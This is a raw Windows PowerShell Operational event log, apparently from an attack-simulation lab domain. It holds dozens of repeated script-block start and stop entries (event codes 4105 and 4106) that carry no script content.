RecordNumber=1471226
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471225
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471224
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471223
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471222
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471221
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471220
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471219
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471218
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471217
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471216
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471215
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471214
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471213
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471212
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471211
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471210
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471209
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471208
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471207
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471206
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471205
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471204
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471203
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471202
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471201
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471200
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471199
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471198
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471197
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471196
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471195
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471194
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471193
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471192
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471191
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471190
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471189
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471188
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471187
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471186
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471185
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471184
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471183
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471182
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471181
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471180
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471179
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471178
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471177
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471176
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471175
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471174
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471173
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471172
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
